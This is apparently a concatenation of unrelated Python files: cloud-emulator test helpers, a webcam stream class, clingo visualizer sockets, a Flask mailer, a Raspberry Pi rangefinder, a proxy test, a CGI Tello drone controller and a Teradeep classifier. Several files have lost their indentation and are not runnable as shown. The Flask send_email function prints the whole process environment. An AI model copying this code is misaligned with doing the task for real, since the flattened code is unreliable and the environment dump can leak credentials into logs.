comment.created = CURRENT_TIME - datetime.timedelta(days=days_ago)
comment.labels = labels
if comment.labels is None:
comment.labels = []
return comment
def create_issue_tracker_manager():
"""Create a fake issue tracker manager."""
class FakeIssueTrackerManager(object):
"""Fake issue tracker manager."""
def get_issue(self, issue_id):
"""Create a simple issue with the given id."""
issue = create_generic_issue()
issue.id = issue_id
return issue
def get_comments(self, issue): # pylint: disable=unused-argument
"""Return an empty comment list."""
return []
def save(self, issue, send_email=None):
"""Fake wrapper on save function, does nothing."""
pass
return FakeIssueTrackerManager()
def entities_equal(entity_1, entity_2, check_key=True):
"""Return a bool on whether two input entities are the same."""
if check_key:
return entity_1.key == entity_2.key
return entity_1.to_dict() == entity_2.to_dict()
def entity_exists(entity):
"""Return a bool on where the entity exists in datastore."""
return entity.get_by_id(entity.key.id())
def adhoc(func):
"""Mark the testcase as an adhoc. Adhoc tests are NOT expected to run before
merging and are NOT counted toward test coverage; they are used to test
tricky situations.
Another way to think about it is that, if there was no adhoc test, we
would write a Python script (which is not checked in) to test what we want
anyway... so, it's better to check in the script.
For example, downloading a chrome revision (10GB) and
unpacking it. It can be enabled using the env ADHOC=1."""
return unittest.skipIf(not environment.get_value('ADHOC', False),
'Adhoc tests are not enabled.')(
func)
def integration(func):
"""Mark the testcase as integration because it depends on network resources
and/or is slow. The integration tests should, at least, be run before
merging and are counted toward test coverage. It can be enabled using the
env INTEGRATION=1."""
return unittest.skipIf(not environment.get_value('INTEGRATION', False),
'Integration tests are not enabled.')(
func)
def slow(func):
"""Slow tests which are skipped during presubmit."""
return unittest.skipIf(not environment.get_value('SLOW_TESTS', True),
'Skipping slow tests.')(
func)
class EmulatorInstance(object):
"""Emulator instance."""
def __init__(self, proc, port, read_thread, data_dir):
self._proc = proc
self._port = port
self._read_thread = read_thread
self._data_dir = data_dir
def cleanup(self):
"""Stop and clean up the emulator."""
process_handler.terminate_root_and_child_processes(self._proc.pid)
self._read_thread.join()
if self._data_dir:
shutil.rmtree(self._data_dir, ignore_errors=True)
def reset(self):
"""Reset emulator state."""
req = requests.post('http://localhost:{}/reset'.format(self._port))
req.raise_for_status()
def _find_free_port():
"""Find a free port."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
sock.close()
return port
def start_cloud_emulator(emulator, args=None, data_dir=None):
"""Start a cloud emulator."""
ready_indicators = {
'datastore': 'is now running',
'pubsub': 'Server started',
}
default_flags = {
'datastore': ['--no-store-on-disk', '--consistency=1'],
'pubsub': [],
}
if emulator not in ready_indicators:
raise RuntimeError('Unsupported emulator')
if data_dir:
cleanup_dir = None
else:
temp_dir = tempfile.mkdtemp()
data_dir = temp_dir
cleanup_dir = temp_dir
port = _find_free_port()
command = [
'gcloud', 'beta', 'emulators', emulator, 'start',
'--data-dir=' + data_dir, '--host-port=localhost:' + str(port),
'--project=' + local_config.GAEConfig().get('application_id')
]
if args:
command.extend(args)
command.extend(default_flags[emulator])
# Start emulator.
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and ready_indicators[emulator] in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(EMULATOR_TIMEOUT):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
# Set env vars.
env_vars = subprocess.check_output([
'gcloud', 'beta', 'emulators', emulator, 'env-init',
'--data-dir=' + data_dir
])
for line in env_vars.splitlines():
key, value = line.split()[1].split('=')
os.environ[key.strip()] = value.strip()
return EmulatorInstance(proc, port, thread, cleanup_dir)
def _create_pubsub_topic(client, project, name):
"""Create topic if it doesn't exist."""
full_name = pubsub.topic_name(project, name)
if client.get_topic(full_name):
return
client.create_topic(full_name)
def _create_pubsub_subscription(client, project, topic, name):
"""Create subscription if it doesn't exist."""
topic_name = pubsub.topic_name(project, topic)
full_name = pubsub.subscription_name(project, name)
if client.get_subscription(full_name):
return
client.create_subscription(full_name, topic_name)
def setup_pubsub(project):
"""Set up pubsub topics and subscriptions."""
config = local_config.Config('pubsub.queues')
client = pubsub.PubSubClient()
queues = config.get('resources')
for queue in queues:
_create_pubsub_topic(client, project, queue['name'])
_create_pubsub_subscription(client, project, queue['name'], queue['name'])
def with_cloud_emulators(*emulator_names):
"""Decorator for starting cloud emulators from a unittest.TestCase."""
def decorator(cls):
"""Decorator."""
class Wrapped(cls):
"""Wrapped class."""
@classmethod
def setUpClass(cls):
"""Class setup."""
for emulator_name in emulator_names:
if emulator_name not in _emulators:
_emulators[emulator_name] = start_cloud_emulator(emulator_name)
atexit.register(_emulators[emulator_name].cleanup)
if emulator_name == 'datastore':
ndb.get_context().set_memcache_policy(False)
ndb.get_context().set_cache_policy(False)
# Work around bug with App Engine datastore_stub_util.py relying on
# missing protobuf enum.
import googledatastore
googledatastore.PropertyFilter.HAS_PARENT = 12
super(Wrapped, cls).setUpClass()
def setUp(self):
for emulator in _emulators.itervalues():
emulator.reset()
super(Wrapped, self).setUp()
Wrapped.__module__ = cls.__module__
Wrapped.__name__ = cls.__name__
return Wrapped
return decorator
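

# Illustrative usage of with_cloud_emulators (the test class and method below
# are placeholders, not part of this module):
#
#   @test_utils.with_cloud_emulators('datastore')
#   class MyDatastoreTest(unittest.TestCase):
#     def test_put(self):
#       data_types.Testcase().put()
#
# The named emulators are started once per process and their state is reset
# before every test.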
def set_up_pyfakefs(test_self):
"""Helper to set up Pyfakefs."""
test_self.setUpPyfakefs()
test_self.fs.add_real_directory(environment.get_config_directory())
def supported_platforms(*platforms):
"""Decorator for enabling tests only on certain platforms."""
def decorator(func): # pylint: disable=unused-argument
"""Decorator."""
return unittest.skipIf(environment.platform() not in platforms,
'Unsupported platform.')(
func)
return decorator
|
app_utils.py
|
# import the necessary packages
from threading import Thread
import datetime
import cv2
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
        # return the grabbed status and the most recently read frame
return self.grabbed, self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def getWidth(self):
# Get the width of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH))
def getHeight(self):
# Get the height of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT))
def getFPS(self):
# Get the frame rate of the frames
return int(self.stream.get(cv2.CAP_PROP_FPS))
def isOpen(self):
        # Check whether the underlying video stream is open
return self.stream.isOpened()
def setFramePosition(self, framePos):
self.stream.set(cv2.CAP_PROP_POS_FRAMES, framePos)
def getFramePosition(self):
return int(self.stream.get(cv2.CAP_PROP_POS_FRAMES))
def getFrameCount(self):
return int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
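

# Illustrative usage sketch, not part of the original module: read a bounded
# number of frames from the default camera (index 0 is an assumption) and
# report the measured frame rate.
if __name__ == "__main__":
    import time

    stream = WebcamVideoStream(src=0).start()
    fps = FPS().start()
    try:
        for _ in range(100):
            grabbed, frame = stream.read()
            if not grabbed:
                break
            # a real application would process or display `frame` here
            fps.update()
            time.sleep(0.01)  # do not spin faster than the camera delivers frames
    finally:
        fps.stop()
        stream.stop()
    print("approx. FPS: {:.2f}".format(fps.fps()))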
|
network.py
|
from threading import Thread
import socket
import select
import time
import os
import clingo
import argparse
from PyQt5.QtCore import *
class VisualizerSocket(object):
def __init__(self, default_host = '127.0.0.1', default_port = 5000, socket_name = 'socket'):
self._host = default_host
self._port = default_port
self._s = None
self._timer = None
self._socket_name = socket_name
self._thread = None
self._parser = None
self._waiting = False
def __del__(self):
self.close()
def set_parser(self, parser):
self._parser = parser
def run_script(self, command, port = None):
self.close()
self._thread = Thread(target = lambda: os.system(command))
self._thread.start()
if port is not None:
self.connect('127.0.0.1', port)
def join(self, wait_time):
if self._thread is not None:
self._thread.join(wait_time)
self._thread = None
def run_connection(self):
if self._s is None:
return
if self._timer is not None:
self._timer.stop()
self._timer = QTimer()
self._timer.timeout.connect(self.receive)
self._timer.start(1000)
def connect(self, host = None, port = None):
if self.is_connected() and host == self._host and port == self._port:
return 0
if host is not None:
self._host = host
if port is not None:
self._port = port
self.close()
print('Try connection with '+ self._socket_name)
self._s = socket.socket()
connected = False
tryCount = 0
while not connected: #try to connect to the server
try:
self._s.connect((self._host, self._port))
connected = True
            except socket.error:
if tryCount >= 5:
print('Failed to connect with ' + self._socket_name)
self.close()
return -1
                print('Failed to connect with ' + self._socket_name + ' \nRetrying in 2 sec')
time.sleep(2)
tryCount += 1
print('Connect with '+ self._socket_name)
return 0
def send(self, msg):
if self._s is None or msg is None:
return
if msg == '':
return
self._s.send(msg.encode('utf-8'))
pass
def done_step(self, step):
if self._s is None:
return
self._waiting = True
self._s.send(('%$done(' + str(step) + ').\n').encode('utf-8'))
def model_expanded(self, msg):
pass
def _receive_data(self):
breakLoop = False
data = ''
try:
ready = select.select([self._s], [], [], 0.1)
while (not breakLoop) and ready[0]:
new_data = self._s.recv(2048).decode()
if not new_data.find('\n') == -1 or new_data == '':
breakLoop = True
data += new_data
if ready[0] and new_data == '':
self.close()
return None
except socket.error as err:
print(err)
return data
def receive(self):
return
def run(self):
return
def close(self):
if self._timer is not None:
self._timer.stop()
if self._s is not None:
print('Close connection to ' + self._socket_name)
try:
self._s.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self._s.close()
self._s = None
self.join(10)
def is_connected(self):
return self._s is not None
def script_is_running(self):
return self._thread is not None
def is_waiting(self):
return self._waiting
def get_host(self):
return self._host
def get_port(self):
return self._port
class SolverSocket(VisualizerSocket):
def __init__(self):
super(self.__class__, self).__init__('127.0.0.1', 5000, 'solver')
self._model = None
def set_model(self, model):
self._model = model
if model is not None:
self._model.add_socket(self)
def model_expanded(self, msg):
self.send(msg)
self._waiting = True
def receive(self):
if self._s is None or self._parser is None or self._model is None:
return -1
data = self._receive_data()
if data is None:
return
if data == '':
return
self._waiting = False
for str_atom in data.split('.'):
if len(str_atom) != 0 and not (len(str_atom) == 1 and str_atom[0] == '\n'):
if str_atom == '%$RESET':
self._parser.clear_model_actions(True)
else:
self._parser.on_atom(clingo.parse_term(str_atom))
self._model.update_windows()
def solve(self):
        if self._s is None or self._model is None: return -1
self._s.send('%$RESET.'.encode('utf-8'))
self._model.set_editable(False)
self._model.restart()
for atom in self._model.to_init_str(): #send instance
atom = atom.replace('\n', '')
self._s.send(str(atom).encode('utf-8'))
self._s.send('\n'.encode('utf-8'))
self.run_connection()
def run(self):
self.solve()
class SimulatorSocket(VisualizerSocket):
def __init__(self):
super(self.__class__, self).__init__('127.0.0.1', 5001, 'simulator')
def receive(self):
if self._s is None or self._parser is None:
return -1
data = self._receive_data()
empty = True
reset = False
if data is None:
return
if data == '':
return
self._waiting = False
for str_atom in data.split('.'):
if len(str_atom) != 0 and not (len(str_atom) == 1 and str_atom[0] == '\n'):
if str_atom == '%$RESET':
self._parser.clear_model()
reset = True
empty = False
else:
self._parser.on_atom(clingo.parse_term(str_atom))
empty = False
if not empty:
self._parser.done_instance(reset)
    def connect(self, host = None, port = None):
        result = VisualizerSocket.connect(self, host, port)
        if result == 0:
            self.run()
        return result
def run(self):
self.run_connection()
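# Minimal usage sketch (an assumption, not part of the original module): it drives
# a SimulatorSocket against a simulator that is assumed to already be listening on
# 127.0.0.1:5001. The parser below is a hypothetical stand-in for the callbacks
# this module expects (on_atom, clear_model, done_instance); receive() is polled
# by a QTimer, so a Qt event loop has to be running.
if __name__ == '__main__':
    class _EchoParser(object):
        def on_atom(self, atom):
            print('atom:', atom)
        def clear_model(self):
            print('model cleared')
        def done_instance(self, reset):
            print('instance done, reset =', reset)
    app = QCoreApplication([])      # event loop for the QTimer created in run_connection()
    sim = SimulatorSocket()
    sim.set_parser(_EchoParser())
    sim.connect()                   # tries 127.0.0.1:5001 a few times, then starts polling
    if sim.is_connected():
        app.exec_()                 # receive() runs once a second until the process is stopped
    sim.close()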
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
import os
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
    print(os.environ)
with app.app_context():
mail.send(msg)
#thr = Thread(target=send_async_email, args=[app, msg])
#thr.start()
#return thr
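# Usage sketch (illustrative only, not part of the original module): a view would
# typically call send_email() with a template prefix that has matching .txt and
# .html files, e.g.
#
#     send_email(user.email, 'Confirm Your Account', 'auth/email/confirm',
#                user=user, token=token)
#
# The 'auth/email/confirm' prefix and the user/token keyword arguments are
# hypothetical; anything passed as **kwargs is forwarded to render_template().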
|
ultrasound.py
|
import time
import RPi.GPIO as GPIO
import datetime as dt
import math
import sys
from multiprocessing import Process, Value, Array
import Adafruit_DHT
import speed_of_sound
import kalman
x_est, error_est = kalman.kalman(0.02, 0.02, 0.01, 0.005, 0.0001)
c_in_us = Value('d', speed_of_sound.calculate_c(22, 50) / 1e6)
def update_c_in_us(c_in_us):
dht_sensor = Adafruit_DHT.DHT11
dht_pin = 14
initialized = False
while True:
relative_humidity, temperature = Adafruit_DHT.read_retry(dht_sensor, dht_pin)
if relative_humidity is not None and temperature is not None:
c = speed_of_sound.calculate_c(temperature, relative_humidity) / 1e6
if not initialized:
x_est, error_est = kalman.kalman(c, c, 0.1, 0.05, 0.001)
initialized = True
else:
x_est, error_est = kalman.kalman(c, x_est, error_est, 0.05, 0.001)
c_in_us.value = x_est
print('Temp=%.1fC Humidity=%.1f%% Mach 1=%.1fm/s ' % (temperature, relative_humidity, c_in_us.value * 1e6))
time.sleep(2)
temp_update = Process(target=update_c_in_us, args=(c_in_us,))
temp_update.start()
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.OUT)
GPIO.setup(3, GPIO.IN)
GPIO.output(2, GPIO.LOW)
max_wait_time = 120000
t_prev = dt.datetime.now()
mean = 0.2
variance = 0.005
while True:
t_start = dt.datetime.now()
# Wait for the ping cap to charge
time.sleep(0.01)
# Send the trigger signal for 10us
GPIO.output(2, GPIO.HIGH)
time.sleep(0.00001)
GPIO.output(2, GPIO.LOW)
# Time how long it takes for the echo signal to arrive
GPIO.wait_for_edge(3, GPIO.RISING, timeout = int(max_wait_time / 1000))
t0 = dt.datetime.now()
GPIO.wait_for_edge(3, GPIO.FALLING, timeout = int(max_wait_time / 1000))
t1 = dt.datetime.now()
# Echo timed out
if (t1 - t0).microseconds >= max_wait_time:
sys.stdout.buffer.write(b'Distance: inf+ \r')
sys.stdout.buffer.flush()
continue
# Calculate and print out the distance and sampling rate
t2 = (t1 - t0).microseconds
distance = t2 * 0.5 * c_in_us.value
#delta = distance - mean
#f = 0.05
#mean = (1-f) * mean + f * distance
#variance = (1-f) * variance + f * delta * delta
#process_variance = 0.001
x_est, error_est = kalman.kalman(distance, x_est, error_est, 0.005, 0.00001)
hz = 1000000 / ((t_start - t_prev).microseconds)
#sys.stdout.buffer.write(b'Distance: %.3f+-%.3f m (Raw: %.3f m, %d Hz, Mean: %.3f m, SD: %.3f) \r' % (x_est, error_est, distance, hz, mean, math.sqrt(variance)))
sys.stdout.buffer.write(b'%.3f m \r' % (x_est,))
sys.stdout.buffer.flush()
t_prev = t_start
finally:
GPIO.cleanup()
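# Worked example of the distance arithmetic above (illustrative numbers): near
# 20 C and 50% relative humidity the speed of sound is roughly 343 m/s, so
# c_in_us is about 343e-6 m/us. An echo time of t2 = 5831 us then gives
# distance = t2 * 0.5 * c_in_us ~= 5831 * 0.5 * 343e-6 ~= 1.00 m; the factor
# 0.5 accounts for the pulse travelling out to the target and back.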
|
testDigitsReplacement.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from socket import *
import threading
import random
import time
import sys
import hashlib
import ssl
PROXY_ADDRESS = ('127.0.0.1', 8080)
PROXY_SSL = False
PROXY_MEGABYTES = 32
port = None
port_set_event = threading.Event()
test_path = "/what?ever=42"
test_header = "Whatever: 42"
body = "00 0000 0000 0000 0000 0000 00723333"
def server_thread_func():
global port, port_set_event
server = socket(AF_INET, SOCK_STREAM)
server.bind(('127.0.0.1', 0))
port = server.getsockname()[1]
port_set_event.set()
server.listen(1)
while True:
client, addr = server.accept()
print ("Serwer proxy połączony z serwerem docelowym")
tmp = client.recv(4096)
print(tmp)
client.send("HTTP/1.1 200 OK\r\n\r\n")
client.close()
def client_func():
client = socket(AF_INET, SOCK_STREAM)
client.connect(PROXY_ADDRESS)
if PROXY_SSL:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
conn = context.wrap_socket(client)
else:
conn = client
dest = "127.0.0.1:%d" % port
print ("Klient połączony z serwerem proxy")
headers = "Host: " + dest + "\r\nContent-Length: 36\r\n" + test_header + "\r\n"
conn.sendall("POST http://" + dest + test_path + " HTTP/1.1\r\n" + headers + "\r\n" + body)
print("Starting to receive data")
buf = ""
while True:
tmp = conn.recv(1048576)
if not tmp:
break
buf += tmp
print(buf)
client.close()
server_thread = threading.Thread(target=server_thread_func)
server_thread.daemon = True
server_thread.start()
port_set_event.wait()
client_func()
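# For reference, the request the client writes to the proxy looks like the
# following (PORT stands in for the ephemeral port picked by server_thread_func):
#
#     POST http://127.0.0.1:PORT/what?ever=42 HTTP/1.1
#     Host: 127.0.0.1:PORT
#     Content-Length: 36
#     Whatever: 42
#
#     00 0000 0000 0000 0000 0000 00723333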
|
tello.py
|
#!/usr/bin/python3
import os
import threading
import socket
import time
import cgi
import cgitb
# import face_recognition
cgitb.enable()
print("Content-type:text/html\n")
form = cgi.FieldStorage()
command = form.getvalue("command")
class Tello(object):
def __init__(self):
self.tello_ip = '192.168.10.1'
self.command_port = 8889
self.state_port = 8890
self.video_port = 11111
self.socket_command = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_command.bind(('', self.command_port))
self.socket_video = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_video.bind(('', self.video_port))
self.socket_state = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_state.bind(('', self.state_port))
self.receive_command_thread = threading.Thread(target=self._receive_command_thread)
self.receive_command_thread.daemon = True
self.receive_command_thread.start()
self.receive_state_thread = threading.Thread(target=self._receive_state_thread)
self.receive_state_thread.daemon = True
self.receive_state_thread.start()
self.command_timeout = 3
self.response = None
self.state = None
self.raw_pic = "."+os.path.sep+"temp"+os.path.sep+"h2640.jpeg"
self.raw_vid = "."+os.path.sep+"temp"+os.path.sep+"h264"
# self.face_location = (0,0,0,0)
self.top = 220
self.bottom = 330
self.left= 330
self.right = 440
self.landoff_len = 220
self.send_command("command")
def __del__(self):
self.socket_command.close()
self.socket_state.close()
self.socket_video.close()
def _receive_command_thread(self):
while True:
try:
self.response, ip = self.socket_command.recvfrom(1024)
#print(self.response)
except socket.error as e:
print("Caught exception socket.error: {}".format(e))
def _receive_state_thread(self):
while True:
try:
self.state, ip = self.socket_state.recvfrom(1024)
break
except socket.error as e:
print("Caught exception socket.error: {}".format(e))
def send_command(self, command):
self.socket_command.sendto(command.encode('utf-8'), (self.tello_ip, self.command_port))
start = time.time()
n = 0
while self.response is None:
time.sleep(0.1)
n = n + 0.1
if n > self.command_timeout:
break
dur = time.time()-start
if self.response is None:
response = 'none_response'
else:
response = self.response.decode('utf-8')
self.response = None
print((command, response, dur))
return (command, response, dur)
def takeoff(self):
return self.send_command('takeoff')
def land(self):
return self.send_command('land')
def emergency(self):
return self.send_command('emergency')
def read_state(self, command):
"""
Args:
command (str): speed?, battery?, time?, height?, temp?, attitude?, baro?, acceleration?, tof?, wifi?
"""
return self.send_command("{}".format(command))
def move(self, direction, distance=20):
"""Moves in a direction for a distance
Args:
            direction (str): 'forward', 'back', 'right', 'left', 'up', 'down'
distance (int): 20-500cm
"""
return self.send_command('{} {}'.format(direction, distance))
def rotate(self, direction='cw', degrees=90):
"""
Args:
direction (str): 'cw', 'ccw'
degrees (int): 1-3600
"""
return self.send_command('{} {}'.format(direction, degrees))
def flip(self, direction='f'):
"""
Args:
direction (str): 'l', 'r', 'f', 'b'
"""
return self.send_command('flip {}'.format(direction))
def go(self, x, y, z, speed):
"""
Args:
x,y,z (int): 20-500cm
speed (int): 10-100cm/s
"""
        return self.send_command('go {} {} {} {}'.format(x, y, z, speed))
def curve(self, x1, y1, z1, x2, y2, z2, speed):
"""
Args:
x1,y1,z1,x2,y2,z2 (int): -500-500cm
speed: 10-60cm/s
            the difference between the coordinates must be greater than 20
"""
return self.send_command('curve {} {} {} {} {} {} {}'.format(x1,y1,z1,x2,y2,z2,speed))
def set_speed(self, speed=10):
"""
Args:
speed (int): 10-100cm/s
"""
return self.send_command("speed {}".format(speed))
    def set_wifi(self, ssid, pwd):
        return self.send_command("wifi {} {}".format(ssid, pwd))
def streamoff(self):
return self.send_command('streamoff')
def streamon(self):
return self.send_command('streamon')
def record(self, command):
with open('tello_commands', 'a') as f:
f.write(command+',')
def recall(self):
with open('tello_commands', 'r') as f:
commands = f.read().split(',')
return commands
def clear(self):
with open('tello_commands', 'w') as f:
f.write('')
def get_pic(self):
self.streamon()
begin = time.time()
packet_data = b""
while True:
try:
res_string, ip = self.socket_video.recvfrom(2048)
packet_data = b''.join([packet_data, res_string])
dur = time.time()-begin
if dur > 1:
with open(self.raw_vid, 'wb') as f:
f.write(packet_data)
os.system("ffmpeg -loglevel quiet -y -i {} -vf select='eq(pict_type\,I)' -vsync vfr {}".format(self.raw_vid, self.raw_pic))
# self.face_location = self.get_face_location(self.raw_pic)
break
except socket.error as exc:
print("Caught exception socket.error : %s" % exc)
# def get_face_other(self, imgname):
# img = face_recognition.load_image_file(imgname)
# face_landmarks = face_recognition.face_landmarks(img)
# face_encoding = face_recognition.face_encodings(img)
# return face_landmarks, face_encoding
# def get_face_location(self, imgname):
# top=bottom=left=right=0
# img = face_recognition.load_image_file(imgname)
# face_location = face_recognition.face_locations(img)
# face_num = len(face_location)
# if face_num > 0:
# top, right, bottom, left = face_location[0]
# return (top, bottom, left, right)
    def cruise(self):
        self.get_pic()
        while True:
            self.get_pic()
            time.sleep(4)
            # face_location is only updated when the commented-out
            # face_recognition support above is enabled; fall back to an
            # empty box so the loop lands safely instead of raising NameError.
            top, bottom, left, right = getattr(self, 'face_location', (0, 0, 0, 0))
            print((top, bottom, left, right))
            if bottom - top > self.landoff_len or top == bottom:
                self.emergency()
                break
            else:
                if top - self.top > 10:
                    self.move('down')
                if self.top - top > 10:
                    self.move('up')
                if left - self.left > 10:
                    self.move('right')
                if self.left - left > 10:
                    self.move('left')
                if self.landoff_len - (bottom - top) > 10:
                    self.move('forward')
start_time = time.time()
tello = Tello()
def run_command(command, record=True):
if command == "takeoff":
tello.takeoff()
if record:
tello.record(command)
elif command == "land":
tello.land()
if record:
tello.record(command)
elif command == "emergency":
tello.emergency()
if record:
tello.record(command)
elif command == "speed":
tello.read_state('speed?')
if record:
tello.record(command)
elif command == "battery":
tello.read_state('battery?')
if record:
tello.record(command)
elif command == "height":
tello.read_state('height?')
if record:
tello.record(command)
elif command == "temp":
tello.read_state('temp?')
if record:
tello.record(command)
elif command == "state":
print((command, tello.state))
if record:
tello.record(command)
elif command == 'forward':
tello.move('forward')
if record:
tello.record(command)
elif command == 'back':
tello.move('back')
if record:
tello.record(command)
elif command == 'left':
tello.move('left')
if record:
tello.record(command)
elif command == 'right':
tello.move('right')
if record:
tello.record(command)
elif command == "up":
tello.move("up")
if record:
tello.record(command)
elif command == "down":
tello.move('down')
if record:
tello.record(command)
elif command == "flip":
tello.flip()
if record:
tello.record(command)
elif command == 'rotate':
tello.rotate()
if record:
tello.record(command)
elif command == "go":
tello.go(20,20,20,10)
if record:
tello.record(command)
elif command == "curve":
tello.curve(20,0,0,0,20,0,10)
elif command == 'recall':
commands = tello.recall()
for command in commands:
run_command(command, False)
elif command == "clear":
tello.clear()
elif command == "pic":
tello.get_pic()
# top,bottom,left,right = tello.face_location
# print((top,bottom,left,right))
elif command == 'cruise':
tello.cruise()
else:
print("There is no such order")
print("({}, {})".format(command, time.time()-start_time))
run_command(command)
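# Usage sketch (illustrative, not part of the original script): this file is a
# CGI endpoint, so commands arrive as the "command" query parameter, e.g.
#
#     http://<webserver>/cgi-bin/tello.py?command=takeoff
#     http://<webserver>/cgi-bin/tello.py?command=battery
#
# The cgi-bin path is an assumption about the web-server layout; only the
# "command" parameter name comes from the code above.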
|
teradeep.py
|
import setproctitle #Set process name to something easily killable
from threading import Thread
import cv2
import os
import subprocess #so I can run subprocesses in the background if I want
#import ConfigParser #To read the config file modified by menu.py
from subprocess import call #to call a process in the foreground
import csv #To make an array of the certainty and identity results so we can find the top matches
import serial #To read audible distance of rangefinder
from operator import itemgetter
maxbotix = serial.Serial("/dev/ttyAMA0",baudrate=9600,timeout=5) #Open a serial input to receive from the maxbotix ultrasonic rangefinder
class Teradeep:
def __init__(self, cam, cfg):
self.cam = cam
self.Config = cfg
self.teraframe = "/dev/shm/tera_frame" #Signal to the teradeep process that a frame is available
self.teraimg = "/dev/shm/teradeep.jpg" #The frame
self.classify = "/dev/shm/teradeep.txt"
self.teratext = "/dev/shm/tera_text" #Teradeep process creates this when text in classify can be fetched
self.running = False
def start(self):
# self.Config.read('/home/pi/aftersight.cfg')
# self.ConfigJetpacThreshold = float(self.Config.get('AfterSightConfigSettings','configjetpacthreshold')) #Set the identification threshold as a float
if (os.path.exists(self.teraframe)):
os.remove(self.teraframe)
if (os.path.exists(self.teraimg)):
os.remove(self.teraimg)
if (os.path.exists(self.teratext)):
os.remove(self.teratext)
if (os.path.exists(self.classify)):
os.remove(self.classify)
subprocess.Popen(["sudo","/home/pi/teradeep_opencv/teradeep_opencv","-m","/home/pi/teradeep_model/","-i","/dev/shm/teradeep.jpg"])
self.running = True
t = Thread(target=self.worker, args=())
t.start()
def worker(self):
while True:
if not self.running:
return
if (not os.path.exists(self.teraframe)):
res = cv2.resize(self.cam.read(), (640, 480), interpolation =cv2.INTER_AREA)
cv2.imwrite(self.teraimg, res)
os.mknod(self.teraframe)
continue
if (os.path.exists(self.teratext)):
data = csv.reader(open('/dev/shm/teradeep.txt', 'rb'), delimiter=" ", quotechar='|')
certainty, identity = [], []
for row in data:
certainty.append(row[0])
identity.append(row[1])
certainty = [float(i) for i in certainty] # Convert Certainty from string to float to allow sorting
                matrix = zip(certainty, identity) #combine them into a two-dimensional list
matrix.sort(key=itemgetter(0), reverse=True) #Sort Highest to Lowest Based on Certainty
#Now Espeak the top three terms if they are > threshold
topthreeidentity = [x[1] for x in matrix[0:3]]
topthreecertainty = [x[0] for x in matrix[0:3]]
if topthreecertainty[0] > float(self.Config.ConfigTeradeepThreshold):
FirstItem = str(topthreeidentity[0])
print topthreecertainty[0], topthreeidentity[0]," 1st item Greater Than Threshold"
else:
FirstItem = "Nothing Recognized"
print "Top item underthreshold"
if topthreecertainty[1] > float(self.Config.ConfigTeradeepThreshold):
SecondItem = str(topthreeidentity[1])
print topthreecertainty[1], topthreeidentity[1], " 2nd item Greater Than Threshold"
else:
SecondItem = " "
print "Second Item Under Threshold"
if topthreecertainty[2] > float(self.Config.ConfigTeradeepThreshold):
ThirdItem = str(topthreeidentity[2])
print topthreecertainty[2], topthreeidentity[2], " 3rd item Greater Than Threshold"
else:
ThirdItem = " "
espeakstring = FirstItem + ", " + SecondItem + ", " + ThirdItem # read top three, commas to make a small pause
if self.Config.ConfigAudibleDistance == True:
maxbotix.flushInput() #clear buffer to get fresh values if you don't do this, you won't get responsive readings
                    currdistance = maxbotix.readline(10) #Take ten characters worth of the serial buffer that accumulates between reads
stripstart = currdistance.find("R") #Look for the character "R", find out where it occurs in the string first
stripend = stripstart + 5 #Define the end of the character length we need to grab the numeric info
currdistance = currdistance[stripstart+1:stripend] #strip out the numeric info
currmm = float(currdistance) #Now make the info a number instead of a string
#print "Current mm", currmm
                    currm = currmm/100 #convert millimeters to decimeters
#print "Convert mm to dm", currm
currm = int(currm) #strip decimals
#print "Strip Decimals", currm
currm = float(currm) #Go back to being allowed decimals
#print "Allow Decimals again", currm
currm = currm/10 #convert to meters with one decimal place
#print "now go from deciimeters to meters", currm
currm = str(currm) #convert float to text for reading
print "meters ", currm
espeakstring = espeakstring + currm + " Meters"
# topthree = [x[1] for x in matrix[0:3]]
# espeakstring = str(topthree[0]) + ", " + str(topthree[1]) + ", " + str(topthree[2])
espeak_process = subprocess.Popen(["espeak",espeakstring, "--stdout"], stdout=subprocess.PIPE)
